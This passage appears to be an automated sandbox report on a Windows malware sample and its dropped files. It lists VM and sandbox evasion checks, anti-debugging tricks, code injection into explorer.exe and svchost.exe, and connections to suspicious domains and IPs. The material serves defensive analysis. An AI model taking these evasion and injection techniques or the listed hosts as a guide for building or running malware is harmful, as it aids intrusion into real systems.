                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion:

                          barindex
                          Found evasive API chain (may stop execution after checking mutex)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                          Source: ujhcrda, 0000000D.00000002.471468545.000000000048B000.00000004.00000020.sdmpBinary or memory string: ASWHOOK
                          Found evasive API chain (may stop execution after checking locale)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
                          Checks if the current machine is a virtual machine (disk enumeration)Show sources
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeEvasive API call chain: GetPEB, DecisionNodes, Sleep
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                          Contains functionality to detect sleep reduction / modificationsShow sources
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_00406AA0
                          Found evasive API chain (may stop execution after checking computer name)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeEvasive API call chain: GetComputerName,DecisionNodes,Sleep
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                          Source: C:\Windows\SysWOW64\svchost.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exe TID: 4676Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 5052Thread sleep time: -180000s >= -30000s
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 2944Thread sleep count: 38 > 30
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 2944Thread sleep time: -38000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 5428Thread sleep time: -30000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                          Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 604
                          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 435
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeAPI coverage: 8.1 %
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeAPI coverage: 6.6 %
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_00406AA0
                          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8B25.exeJump to dropped file
                          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9874.exeJump to dropped file
                          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6674.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeEvaded block: after key decision
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeEvaded block: after key decision
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeEvaded block: after key decision
                          Source: C:\Windows\SysWOW64\svchost.exeEvaded block: after key decision
                          Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: inet_addr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetBestInterface,GetProcessHeap,HeapAlloc,GetAdaptersInfo,HeapReAlloc,GetAdaptersInfo,HeapFree,FreeLibrary,FreeLibrary,
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeAPI call chain: ExitProcess graph end node
                          Source: explorer.exe, 00000005.00000000.383962963.00000000083E0000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
                          Source: explorer.exe, 00000005.00000000.384369308.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                          Source: svchost.exe, 00000028.00000002.703980995.000001D6DA264000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAW
                          Source: explorer.exe, 00000005.00000000.395241022.0000000006410000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: explorer.exe, 00000005.00000000.383962963.00000000083E0000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
                          Source: explorer.exe, 00000005.00000000.395241022.0000000006410000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: WerFault.exe, 00000012.00000002.519792531.0000000004AC0000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.527735406.0000023921EE2000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.527807876.0000023921EED000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.646394149.000001D6D4A29000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.702306270.000001D6DA257000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                          Source: explorer.exe, 00000005.00000000.396996323.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
                          Source: svchost.exe, 0000001C.00000002.527535638.0000023921EA7000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0{
                          Source: explorer.exe, 00000005.00000000.405272364.00000000045BE000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                          Source: explorer.exe, 00000005.00000000.396996323.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                          Source: explorer.exe, 00000005.00000000.384369308.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
                          Source: explorer.exe, 00000005.00000000.403574937.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeProcess information queried: ProcessInformation
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeCode function: 19_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeSystem information queried: ModuleInformation

                          Anti Debugging:

                          barindex
                          Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeSystem information queried: CodeIntegrityInformation
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaSystem information queried: CodeIntegrityInformation
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_0040A7EE LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_00450083 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_00460042 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 12_2_00520083 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 12_2_00530042 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_02070083 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_0208092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_02080D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_00401000 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_0040C180 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeCode function: 19_2_00530083 push dword ptr fs:[00000030h]
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeCode function: 36_2_0067092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeCode function: 36_2_00670D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaProcess queried: DebugPort
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_004038EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_0040FA70 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_1_004027ED LdrLoadDll,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeMemory protected: page guard
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_00408C53 SetUnhandledExceptionFilter,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_004038EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_00403CF4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_0040771C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeCode function: 19_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeCode function: 36_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 39_2_00A59A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                          HIPS / PFW / Operating System Protection Evasion:

                          barindex
                          System process connects to network (likely due to code injection or exploit)Show sources
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                          Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                          Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.47.54.36 25
                          Source: C:\Windows\explorer.exeDomain query: unicupload.top
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 8.209.67.104 443
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                          Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                          Source: C:\Windows\explorer.exeDomain query: goo.su
                          Source: C:\Windows\explorer.exeDomain query: transfer.sh
                          Source: C:\Windows\explorer.exeDomain query: a0621298.xsph.ru
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                          Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                          Benign windows process drops PE filesShow sources
                          Source: C:\Windows\explorer.exeFile created: 8008.exe.5.drJump to dropped file
                          Maps a DLL or memory area into another processShow sources
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Allocates memory in foreign processesShow sources
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: A50000 protect: page execute and read and write
                          Injects a PE file into a foreign processesShow sources
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeMemory written: C:\Users\user\Desktop\0Cjy7Lkv1A.exe base: 400000 value starts with: 4D5A
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaMemory written: C:\Users\user\AppData\Roaming\ujhcrda base: 400000 value starts with: 4D5A
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeMemory written: C:\Users\user\AppData\Local\Temp\B3BA.exe base: 400000 value starts with: 4D5A
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: A50000 value starts with: 4D5A
                          Contains functionality to inject code into remote processesShow sources
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_00460110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                          Creates a thread in another existing process (thread injection)Show sources
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeThread created: C:\Windows\explorer.exe EIP: 4151930
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaThread created: unknown EIP: 61E1930
                          Writes to foreign memory regionsShow sources
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: A50000
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 8A8008
                          .NET source code references suspicious native API functionsShow sources
                          Source: B3BA.exe.5.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: B3BA.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 20.0.B3BA.exe.370000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
